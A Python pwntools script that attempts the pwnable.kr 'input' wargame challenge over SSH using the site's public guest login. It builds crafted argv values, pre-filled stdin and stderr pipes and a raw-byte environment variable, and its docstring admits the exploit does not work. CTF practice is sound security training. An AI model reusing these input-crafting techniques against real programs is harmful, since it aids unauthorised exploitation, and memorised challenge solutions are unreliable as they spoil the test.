from pwn import *
# Keep this line AFTER `from pwn import *`: pwntools star-exports helpers of
# its own (including a `write`) that would otherwise shadow the os functions.
from os import close, pipe, write
"""
This exploit doesn't work because it is a remote exploit.
I can't send data to the pipes properly, nor set the environment variables.
"""
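def exploit():
    """Drive the three stages of the challenge over an SSH session.

    Opens the session, builds argv (stage 1), the stdin/stderr pipes
    (stage 2) and the environment (stage 3), spawns ./input with them and
    prints whatever the program sends back.

    NOTE(review): the descriptors returned by pass_stage2() are pipes on
    this machine, while the process is spawned on the remote host; that
    mismatch looks like the cause of the failure the module docstring
    describes, and this function does not attempt to work around it.
    """
    s = ssh(user='input2', host='pwnable.kr', password='guest', port=2222)
    try:
        args = pass_stage1()
        r1, r2 = pass_stage2()
        env = pass_stage3()
        print(env)
        p = s.process(executable='./input', argv=args, stdin=r1, stderr=r2, env=env)
        # The program's output is not guaranteed to be valid UTF-8; a stray
        # byte should not turn into a traceback once the session is up.
        print(p.recv().decode('utf-8', errors='replace'))
    finally:
        # Tear the SSH session down even if one of the stage helpers raises.
        s.close()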
def pass_stage1():
    """Build the argv list for stage one.

    Returns a 100-element list in which every slot is a single 0x90 byte
    except the ones the challenge inspects: argv[0] names the binary to
    run, argv[ord('A')] is a lone NUL byte and argv[ord('B')] is
    p8(0x20) followed by p16(0x0d0a).
    """
    # Bytes objects are immutable, so sharing one filler value is safe.
    argv = [p8(0x90)] * 100
    argv[0] = './input'
    argv[ord('A')] = p8(0x00)
    argv[ord('B')] = p8(0x20) + p16(0x0d0a)
    return argv
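def pass_stage2():
    """Create the stdin and stderr pipes for stage two.

    Returns ``(stdin_fd, stderr_fd)``: the read ends of two pipes whose
    buffers already hold the four-byte payloads the challenge reads.
    The write ends are closed here — the data stays in the pipe buffer,
    and the caller is not handed two dangling descriptors it never uses.

    ``pipe``/``write``/``close`` are the names imported explicitly from
    ``os`` at the top of the file, rather than an ``os`` module object that
    only reaches this scope by way of ``from pwn import *``.
    """
    stdin_payload = p32(0xff000a00)
    stderr_payload = p32(0xff020a00)
    stdin_r, stdin_w = pipe()
    stderr_r, stderr_w = pipe()
    try:
        write(stdin_w, stdin_payload)
        write(stderr_w, stderr_payload)
    finally:
        # Release the write ends whether or not the writes succeeded.
        close(stdin_w)
        close(stderr_w)
    return stdin_r, stderr_r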
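def pass_stage3():
    r"""Return the environment mapping for stage three.

    The intended variable name is the four raw bytes DE AD BE EF and the
    intended value the four raw bytes CA FE BA BE. Bytes literals are used
    because ``'\xde\xad\xbe\xef'.encode()`` UTF-8-encodes four non-ASCII
    code points into eight bytes (``c3 9e c2 ad c2 be c3 af``), which is
    not what the mapping was meant to contain.
    """
    return {b'\xde\xad\xbe\xef': b'\xca\xfe\xba\xbe'}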
if __name__ == '__main__':
    # Only run when executed as a script, not when imported for its helpers.
    exploit()